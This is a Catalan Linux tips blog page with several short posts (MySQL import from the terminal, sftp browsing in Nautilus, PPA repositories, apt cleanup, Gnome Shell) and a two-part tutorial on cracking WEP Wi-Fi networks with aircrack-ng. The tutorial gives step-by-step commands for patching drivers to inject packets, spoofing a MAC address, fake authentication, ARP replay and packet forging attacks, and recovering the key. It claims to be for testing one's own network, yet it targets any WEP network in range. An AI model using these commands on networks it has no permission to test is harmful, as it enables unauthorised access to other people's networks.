El teu blog de Linux en català

Trucs i tutorials

A l’hora de carregar/importar/pujar una base de dades mysql per phpmyadmin ens podem trobar amb un problema seriós: si la base de dades té una mida superior a 2Mb no podrem carregar-la. Per tant, si estem a local (o tenim accés a la terminal d’un servidor), l’única manera de fer-ho serà mitjançant la terminal. I fer-ho és molt senzill, amb la següent ordre:

mysql --user=[nom_d'usuari] --password=[contrasenya] [nom_de_la_base_de_dades] < fitxer_bd.sql

Fa unes setmanes, el Pol ens va explicar com copiar fitxers des de terminal de forma segura a un ordinador remot. Avui veurem com navegar, també de forma segura, per les carpetes i fitxers d’un equip remot, de manera que hi treballarem com si fos un directori propi, i hi podrem copiar dades, visualitzar documents, o el que més ens interessi.

El primer que necessitem és instal·lar el servidor ssh en l’equip al qual ens volem connectar (això també era necessari en l’scp que ens va presentar el Pol). Això es pot fer a través del paquet “openssh-server”, que tenim disponible directament des dels repositoris oficials de la majoria de distribucions. En el cas d’Ubuntu, el podem instal·lar directament des del Synaptic o, si ho preferim, des d’un terminal:

sudo apt-get install openssh-server

D’aquest ordinador remot, apart, necessitem saber la seva adreça ip. Podem conèixer-la executant-hi la comanda següent:

ifconfig | grep "inet addr"

Aquesta comanda ens retornarà dues adreces ip: la 127.0.0.1 i una altra. Ens interessa l’altra. 🙂

Un cop instal·lat el servidor en la màquina remota, en el nostre equip local obrim un Nautilus (o l’explorador de fitxers que utilitzem habitualment) i, en la barra d’adreces escrivim el següent:

sftp://adreça_ip_remota

Amb aquesta comanda, el primer cop que ens connectem ens demanarà confirmació. Acceptem, i després ens demanarà l’usuari i constrasenya amb què ens volem connectar.

El servidor remot ens demana l'usuari de connexió

El servidor remot ens demana l'usuari de connexió

Un cop entrades, ja hi estarem connectats, i ens podrem moure pels seus directoris com si fos la nostra màquina local. Com sabrem si estem veient els nostres directoris o els remots? Doncs, perquè a la barra d’adreces el nostre directori actual començarà per “sftp://adreça_ip_remota” si estem veient els directoris remots.

Nautilus amb la connexió a l'equip remot

Nautilus amb la connexió a l'equip remot

Apart d’això, si us fixeu en la captura anterior, a la barra lateral del Nautilus tindrem un accés directe a aquest equip remot, com si fos un dispositiu que hàgim connectat, del qual ens podrem desonnectar també com si desmuntéssim un dispositiu.

Amb aquesta connexió, com he comentat abans, podrem copiar fitxers d’un equip a l’altre, obrir els documents remots, copiar carpetes, o el que més ens interessi. A més, com que estem utilitzant la infrastructura ssh, totes les dades viatjaran xifrades.

Per últim, només volia comentar que el programa sftp també es pot invocar des d’un terminal, de la mateixa manera que ho hem fet des del Nautilus.

Getdeb és un pàgina web que neix amb la voluntat d’oferir paquets per a l’Ubuntu amb les últimes versions dels programes que ells empaqueten. Feu-hi un cop d’ull perquè hi ha programes molt interessants, que amb un sol clic s’instal·len.

getdeb_logo

Per a instal·lar el repositori de programes de la web i així tenir sempre de forma automàtica l’última versió dels programes, només cal fer el següent pas depenent de la distribució d’Ubuntu que utilitzeu.

Per a l’Ubuntu 9.04 Jauny Jalope

echo "deb http://getdeb.masio.com.mx/ jaunty/" | sudo tee -a /etc/apt/sources.list

Per a l’Ubuntu 9.10 Karmik Koala

echo "deb http://getdeb.masio.com.mx/ karmik" | sudo tee -a /etc/apt/sources.list

Avui he descobert aquesta aplicació, que ens permet instal·lar paquets a través del nostre navegador web, desde la barra de navegació.

Aquí explicaré com fer-ho desde Firefox, Opera i Konqueror.

(més…)

Quan ens baixem el CD o DVD d’instal·lació d’una distribució de GNU/Linux, podem escollir si baixar-nos la versió de 32 bits o la de 64 bits. En un ordinador que treballi a 32 bits només hi funcionarà la versió pròpia. En canvi, en un ordinador que treballi a 64 bits hi podem instal·lar qualsevol de les dues. Simplement, si hi instal·lem la de 32 bits no aprofitarem les millores que aporta treballar amb 64 bits.

És probable que molts de nosaltres tinguem instal·lada la versió de 32 bits, mentre que podríem tenir perfectament la de 64 bits. M’està mal dir-ho, però aquest ha estat el meu cas fins ara en el meu ordinador de sobretaula. Que fort!!!! 🙂

Podem saber de quin tipus és el nostre processador, només cal executar la comanda següent:

sudo lshw -C cpu

Aquesta ordre ens retornarà una sèrie de línies com aquestes:

*-cpu
description: CPU
product: AMD Sempron(tm) Processor 2800+
vendor: Advanced Micro Devices [AMD]
physical id: 4
bus info: cpu@0
version: 15.12.2
serial: To Be Filled By O.E.M.
slot: Socket 754
size: 1600MHz
capacity: 1600MHz
width: 64 bits
clock: 200MHz
capabilities: boot fpu .....

Ens hem de fixar en la línia on ens indica el camp “width”. En el meu cas, era de 64 bits i, per tant, hi puc instal·lar la versió d’Ubuntu de 64 bits. Ja he engegat el meu sistema amb un Live CD de 64 bits, i he comprovat que em funciona correctament. O sigui que, quan instal·li Ubuntu Karmic Koala en aquest ordinador, ja serà la versió de 64 bits.

Font: Acerca de Ubuntu

Molts cops, per a instal·lar nous programes o per a tenir versions més noves que les que ens proporciona Ubuntu, hem de configurar uns repositoris especials. La majoria d’aquests repositoris són PPA (Personal Package Archive) del Launchpad. En diverses ocasions hem explicat com configurar alguns d’aquests repositoris, per exemple per a l’OpenOffice, l’Amarok o l’OpenSonic.

Amb Ubuntu 9.10 Karmic Koala, que serà alliberat el proper 29 d’octubre, la configuració d’aquests repositoris es simplifica força. En aquesta nova versió, hi ha un programa que ens permet afegir-les fàcilment. Només cal saber el nom de la PPA, que és el que hi ha en la seva línia de repositori (la que afegiríem al fitxer sources.list), just després del “launchpad.net”. Per exemple, si ens centrem en l’OpenSonic, la línia en qüestió era:

deb http://ppa.launchpad.net/szymonw/ppa/ubuntu jaunty main

En aquest cas, el nom de repositori és “szymonw”. Altres cops és més senzill, com per exemple “openoffice-pkgs” per a l’OpenOffice, o “kubuntu-ppa” per a l’Amarok.

A Ubuntu Karmic Koala, hi ha un nou programa que es diu add-apt-repository, que ens permet afegir directament aquests repositoris al nostre sistema. S’utilitza amb la sintaxi següent:

sudo add-apt-repository ppa:nom_repositori_ppa

El programa ja s’encarrega tant d’afegir l’entrada corresponent al fitxer /etc/apt/sources.list com de descarregar-se la clau de xifrat i acceptar-la. Per exemple, per al cas que seguim de l’OpenSonic, només hauríem d’executar:

sudo add-apt-repository ppa:szymonw

I ja podríem actualitzar els paquets i instal·lar el joc.

Però, per simplificar encara una mica més aquesta tasca, també es pot realitzar de forma gràfica. Si executem el menú “Sistema>Administració>Fonts de programari”, anem a la pestanya “Programari de tercers” i fem clic a “Afegir”, directament podem escriure “ppa:nom_repositori_ppa” i ens afegirà completament el repositori.

Afegint repositori ppa

Afegint repositori ppa

Com veieu, una gran ajuda per als que utilitzem habitualment aquests repositoris.

Font: UbuntuGeek

A la primera part es van instal·lar els mòduls per aconseguir que la targeta inalambrica ipw2200 pugui injectar paquets.

En aquesta segona part, s’explicarà com fer petar una xarxa (crackejar-la) per comprovar-ne la seguretat. Per fer-ho, s’usarà el programa aircrack-ng. En un apunt anterior, ja es va explicar el funcionament detallat d’aquest programa. Tanmateix, els passos a seguir amb l’aircrack difereixen segons la targeta inalàmbrica que es tingui. Per tant, aquest tutorial està enfocat concretament a la targeta Intel Pro/Wireless 2200bg (ipw2200). Alhora, es prestarà especial atenció als petits problemes que un se sol trobar, i els trucs que hi ha per solucionar-los.

0. Obrim una consola

Primer de tot s’obrirà una consola com a suprausuari (root). Per fer hi ha dues opcions. Si es disposa d’un compte per l’usuari root, escriurem l’orde següent i s’hi indroduirà la contrasenya.

su

Com que l’usuari root no està habilitat per defecte en Ubuntu, tenim una altra opció

sudo -s

Serà molt més útil i s’evitarà fer-se un embolic obrint noves pestanyes en lloc d’obrir terminals. No us oblideu d’entrar-hi sempre com a suprausuari.

1. Monitorització de la xarxa

El primer s’ha de fer és desactivar el Network Manager. Hi ha dues opcions. La més recomanada és anar sobre l’applet i amb el botó secundari es desmarca l’opció “Habilita la xarxa sense fil. L’altra opció és eliminar-lo a través de la terminal.

killall nm-applet

Engeguem l’airodump-ng. Això ens permetrà veure les xarxes inalàmbriques que es troben dins del rang.

airodump-ng rtap0

Esperem una mica perquè es puguin detectar totes les xarxes disponibles i s’ordenin de millor a pitjor senyal. Observem el tipus de seguretat de cada xarxa, i ens centrem amb les que la tenen del tipus WEP (AUTH).

Ens quedarem amb tres informacions importants.

  • El nom de la xarxa (ESSID).
  • L’identificador numèric de la xarxa (BSSID). Al tutorial s’abreuja a BSSID
  • El canal (CH) a través del qual s’emet.

Un cop tenim aquesta informació parem el monitor amb la combinació de teclat ctrl+c.

2. Associar-nos al Punt d’Accés

Ara reiniciarem els paràmetres de la configuració inalàmbrica perquè no interfereixin amb l’auditoria. Es recomana executar aquest ordre prèviament a la monitorització de les xarxes del punt anterior, ja que de vegades la informació emmagatzemada de la última connexió inalàmbrica interfereix en el procés de detectar noves xarxes. Per simplificar el tutoria es canviarà l’adreça MAC de la targeta inalàmbrica a 00:11:22:33:44:55.

iwconfig eth1 essid 0 channel 0 && ifconfig eth1 up hw ether 00:11:22:33:44:55 && iwconfig eth1 rate 1M

Ara bé el pas decisiu. Us heu d’associar al Punt d’Accés. Per fer-ho, heu d’escriure el nom de la xarxa inalàmbrica i el número del canal. Si el nom de la xarxa conté espais, heu d’escriure el nom entre dobles cometes (p. ex: “Xarxa que te espais”). Si és un nom ocult, només heu d’escriure dues doble cometes sense cap espai entremig (p. ex: “”).

iwconfig eth1 essid nom_de_la_xarxa channel numero_de_canal key s:fakekey mode managed

Si s’està lluny del Punt d’Accés costa fer l’associació. Cal tenir paciència i esperar una mica. És recomanable moure l’ordinador per diversos llocs amb l’objectiu d’estar més aprop del Punt d’Accés i anar mirant l’estat de l’associació amb l’ordre següent. Aquest fet pot marcar la diferència entre associar-se, o no. Quan llegim un missatge en anglès que ens diu Associated ho haurem aconseguit.

iwconfig

3. Captura de paquets

Un cop ens diu que hi estem associats, és l’hora de capturar els paquets.

airodump-ng --bssid BSSID -w dump rtap0

Ara haurem d’esperar fins que veiem que la columna #Data creix una miqueta i ja no mostra el número zero. Això significa que hem començat a capturat paquets. Convé durant tot el procés no tancar mai aquesta aplicació, ja que a través d’aquest monitor veurem si la injecció funciona o no, i la quantitat de paquets capturats.

4. Atac / Injecció de paquets

Aquest és el quid de la qüestió, i el motiu per al qual hem compilat els mòduls de la targeta inalàmbrica perquè pugui injectar paquets. A partir d’uns quants paquets capturats amb l’airodump-ng (de vegades amb només capturar-ne un ja funciona), podem injectar una gran quantitat de paquets per segon. Així no cal esperar dies i dies a que es generi el suficient trànsit per acumular suficients paquets, i finalment, desxifrar la contrasenya.

Si no us n’heu sortit compilant els mòduls de la primera part del tutorial, salteu-vos aquest apartat i aneu directament a l’apartat 5.

4.1. Atac -3

Aquest és el meu atac preferit, perquè amb no res ja podem injectar. No cal ni trobar clients associats al Punt d’Accés.

aireplay-ng -3 -x 1024 -g 1000000 -b BSSID -h 00:11:22:33:44:55 -i rtap0 eth1

S’ha d’esperar una bona estona, i si tot va bé, veureu com la columna de #Data de l’airodump-ng puja ràpidament i el missatge que diu got 0 IPV, passarà del número zero a un número que no pararà de créixer. Això significa que esteu injectant. Enhorabona!

4.1. Atac -4

Aquest atac és més tediós, però de vegades és l’únic remei que ens queda. A més a més, no tots els paquets que capturem serveixen, per al que probablement haureu de provar-ho amb paquets diferents fins que surti (si és que surt).

Quan el programa digui Use this packet?, s’ha de dir y (de yes). Si el paquet no és l’adequat, s’ha der dir que n (de no) i us en deixarà escollir un altre. S’ha de tenir en compte que no serveixen els paquets emesos per vosaltres a causa, per exemple, d’una desconnexió / connexió.

aireplay-ng -4 -a BSSID -h 00:11:22:33:44:55 -i rtap0 eth1

Si tot va bé, veurem una llista amb un número i un percentatge que va augmentant. Quan arribi al 100% ho haureu aconseguit. La sortida del programa ens donarà un nom de paquet .xor, de l’estil.

replay_dec-0000-99999.xor

Ara només caldrà ficar el nom correcte del paquet .xor i executar.

packetforge-ng -0 -a BSSID -h 00:11:22:33:44:55 -k 192.168.1.100 -l 192.168.1.101 -y replay_dec-0000-99999.xor -w arp-request

I ara ja estem preparats per injectar.

aireplay-ng -2 -r arp-request eth1

Si tot va bé, veureu com la columna de #Data de l’airodump-ng puja ràpidament. Això vol dir que esteu injectant.

5. Obtindre la clau

Un s’aconsegueix injectar, ja podem executar el programa per crackejar la clau WEP. El podem deixar funcionant mentre injecta i ell ens trobarà la contrasenya. Normalment ens la treurà amb Hexadecimal, i si té equivalent en ASCII també. Al Network Manager podeu ficar ambdues claus, però li heu de treure tots els dos punts (:) de la clau en Hexadecimal, i deixar-ho com una contrasenya de l’estil af1000dc98af5333, per ficar un exemple.

aircrack-ng -z dump*.cap

6. Netejar

Es netegen tots els fitxers que s’han creat.

rm dump* replay* arp-request*

7. A navegar!

Ara es torna a habilitar la xarxa inalàmbriques al Network Manager. Si l’heu tancat, es pot tornar a obrir amb la combinació de teclat alt+F2, i hi escriviu

nm-applet

Agraïments

Gràcies especialment a l’usuari sky de p1mp4m.es, per la seva inestimable contribució.

Fonts

http://www.p1mp4m.es/index.php?showtopic=24

Seguint amb el tutorial que el Jordi va fer fa temps, m’agradaria iniciar un nou tutorial que tindrà dues parts.

A la primera part s’explicarà com instal·lar els mòduls (drivers) per poder fer que la vostra targeta inalàmbrica pugui injectar paquets.

A la segona part s’explicarà com fer funcionar el programa aircrack-ng per poder fer (crackejar) petar les xarxa inalàmbrica, també dites wifi.

0. Preàmbul. Quan fer-ho servir

Aquest programa, i en concret aquest tutorial, no s’ha d’usar malintencionadament. Aquesta guia s’ha fet amb el pròposit de comprovar la seguretat de les xarxes inalàmbriques, i en concret, la seguretat de la de casa vostra.

Aquesta primera part del tutorial no és indispensable per poder crackejar una xarxa wifi. Si no us en sortiu amb la injecció podeu, podeu seguir la segona part del tutorial, on s’explica com capturar paquets. Així, quan n’haveu recollint uns 40.000 o 60.000, ja podreu desxifrar la contrasenya de la xarxa wifi sense necessitat d’haver-ne d’injectar. Tanmateix, no em faig responsable del temps que es tardi seguint aquest mètode. Tot dependrà del tràfic generat per les persones que usin aquesta xarxa.

1. Identificant el maquinari

Primer de tot, s’ha de comprovar la targeta inalàmbrica que teniu.

lspci | grep Network

Si surt una sortida com aquesta.

06:05.0 Network controller: Intel Corporation PRO/Wireless 2200BG [Calexico2] Network Connection (rev 05)

S’està fent servir la targeta inalàmbrica Intel Pro Wireles 2200BG, i el controlador que s’utilitza s’anomena ipw2200. Per assegurar-se del mòdul que s’utilitza.

lsmod | grep ipw2200

Efectivament, s’ha d’estar usant usant aquest mòdul, i per tant, s’obtindrà quelcom semblant a:

ipw2200 191432 0
ieee80211 55020 1 ipw2200

Un cop identificat el maquinari, s’explicarà com instal·lar els mòduls amb suport per injectar paquets. Si la targeta que s’està usant no és aquesta, podeu buscar-ne el controlador a Internet a partir de la informació del maquinari i del mòdul que s’ha obingut d’executar les ordres anterior, i afegint la paraula “injecció” al cercador.

2. Consideracions preliminars

Aquest tutorial s’ha provat en un Ubuntu 9.04 Jaunty Jackalope, amb la versió del nucli 2.6.28-14-generic. Tanmateix, no hi hauria d’haver cap problema en instal·lar el mòdul en qualsevol altra versió de la branca del nucli 2.6.28. Si ho proveu amb un altre nucli o amb un altre sistema que no sigui l’Ubuntu 9.04 Jauny Jackalope, us agrairia que ho escrivíssiu als comentaris, perquè així ajudareu altra gent amb el vostre sistema. Per comprovar la versió del nucli que s’utilitza.

uname -r

Com que es necessita compilar els mòduls, és necessari que tinguem instal·lats els build-essentials.

sudo aptitude install build-essential

Com que s’ha d’afegir un mòdul al nucli, cal instal·lar les capçaleres del Linux.

sudo aptitude install linux-headers-`uname -r`

Ara ja està tot enllestit per passar al següent pas, la instal·lació dels mòduls al nucli. Cada cop que s’instal·la un nou nucli, es perdrà la capacitat d’injecció i s’haurà de fer tot el procés de nou. Per tant, es recomana que sempre que s’auditi la seguretat d’una xarxa inalàmbrica, s’entri des del nucli on s’ha recompilat el nou mòdul amb suport per a la injecció de paquets.

3. Instal·lant els mòduls amb suport per a la injecció de paquets

Creem una carpeta per tenir-ho tot ordenat.

mkdir wifi; cd wifi

Descarreguem l’arxiu on hi ha els mòduls a instal·lar.

wget http://gnulinux.cat/dev/Injeccion_p1mp4m.tar.gz

Ho descomprimirem.

tar zxvf ieee80211-1.2.18.tgz
tar zxvf ipw2200-1.2.2.tgz
tar zxvf ipw2200-fw-3.1.tgz

Apliquem els pedaços.

patch -p0 < ieee80211-1.2.18_p1mp4m.patch
patch -p0 < ipw2200-1.2.2_p1mp4m.patch

Eliminem la versió anterior, compilem i instal·lam l’ieee80211-1.2.18.

cd ieee80211-1.2.18/
chmod +x remove-old
sudo ./remove-old
sudo make SHELL=/bin/bash
sudo make install SHELL=/bin/bash

Eliminem la versió anterior, compilem i instal·lam l’ipw2200-1.2.2.

cd ../ipw2200-1.2.2/
chmod +x remove-old
sudo ./remove-old
sudo make SHELL=/bin/bash
sudo make install SHELL=/bin/bash

Instal·lem la nova versió del firmware. S’ha de tenir present que en altres distribucions com ara el Debian, la carpeta on es s’emmagatzema el firmware pot canviar de lloc.

cd ../ipw2200-fw-3.1/
sudo cp ./* /lib/firmware/`uname -r`/

Editem o creem l’arxiu /etc/modprobe.d/options.conf perquè es carregui el mòdul automàticament a l’engegar l’ordinador.

gedit /etc/modprobe.d/options.conf

Hi afegim aquesta línia

options ipw2200 rtap_iface=1 led=1

Esborrem els mòduls ieee80211 i ipw2200 que estan carregats ara mateix. (Opcionalment podeu veure els mòduls que estan actualment carregats executant lsmod | grep ieee80211.)

sudo rmmod ieee80211
sudo rmmod ieee80211_crypt
sudo rmmod ipw2200

Carreguem els mòduls recentment compilats.

sudo modprobe ipw2200 rtap_iface=1

Si heu arribat fins aquí, felicitats, ja teniu la targeta preparada per injectar tants paquets per segon com vulgueu.

Agraïments

Gràcies especialment a l’usuari sky i bugmenot de p1mp4m.es, per la seva inestimable contribució.

Fonts

http://www.p1mp4m.es/index.php?showtopic=137

M’agradaria comentar-vos un petit truc per si aneu apurats amb el disc dur. No sé com però a mi sempre em passa. Resulta que ahir volia instal·lar-me un joc i em trobo que només tinc 277 Mb lliures. Així que fent ús del Baobab, he pogut veure quins directoris del disc tenia més ocupats.

Mirant-me una mica les dades, he vist que tenia 3,7 Gb al directori:

/var/cache/apt/

Així que m’he decidit eliminar tots aquests paquets descarregats i que ha tinc instal·lats per fer més espai al disc dur i poder-me viciar una miqueta. Per fer-ho, és tan senzill com executar:

sudo apt-get clean

També us pot ser útil executar l’autoremove, que us permetrà eliminar aquells paquets que s’han quedat obsolets i ja no s’utilitzen i només fan que ocupar espai.

sudo apt-get autoremove

Aprofitant que ja tinc instal·lada la versió Beta d’Ubuntu 9.10 en el meu Netbook, vaig voler provar-hi el que en principi ha de ser una de les bases del proper Gnome 3 (que té previst el seu llençament a finals de març del 2010) el Gnome Shell. Aquest no ve instal·lat de forma predeterminada a Ubuntu Karmic Koala, però sí que està disponible per a poder instal·lar una versió. Cal dir que es troba encara en una fase molt primària de desenvolupament o sigui que, d’una banda, encara no té totes les característiques finals i, a més, encara és força inestable, o sigui que jo no el recomanaria per al seu ús habitual.

Com he comentat, el Gnome Shell és fàcilment instal·lable en Ubuntu Karmic, i és que es pot tenir directament des del Synaptic amb el paquet “gnome-shell” que es troba als seus repositoris oficials. També es pot instal·lar des d’un terminal, executant la comanda següent:

sudo apt-get install gnome-shell

Un cop instal·lat, el Gnome Shell no s’engega automàticament, sinó que ho hem de fer nosaltres. Per a fer-ho, només cal obrir un terminal i executar el següent:

gnome-shell --replace

Un cop l’executem, veurem com canvia la barra superior de Gnome canvia, i tenim una ordre a mà esquerra que hi posa “Activitats”. Aquesta és la base del Gnome Shell. Si hi fem clic (o si ens acostem al marge superior esquerra de la pantalla) la part “útil” de la pantalla es farà més petita i se’ns hi ordenaran les finestres que hi tinguem obertes. A mà esquerra hi veurem el menú d’aplicacions, llocs i documents recents per poder-los anant obrint.

A la part inferior dreta de la pantalla, hi veurem un símbol “+” que, si el premem, ens obrirà nous escriptoris, on podrem anar obrint els programes. Però això és una mica difícil d’explicar amb paraules, o sigui que he gravat un vídeo:

He de dir que el programa funciona prou bé en quant a rendiment (i això que l’estic provant en un Netbook), però es nota molt que encara està en desenvolupament, perquè ja m’ha petat diverses vegades, i he obert el corresponent Bug al Launchpad. El seu funcionament en sí m’ha agradat, però caldrà veure les noves funcionalitats que se li vagin afegint.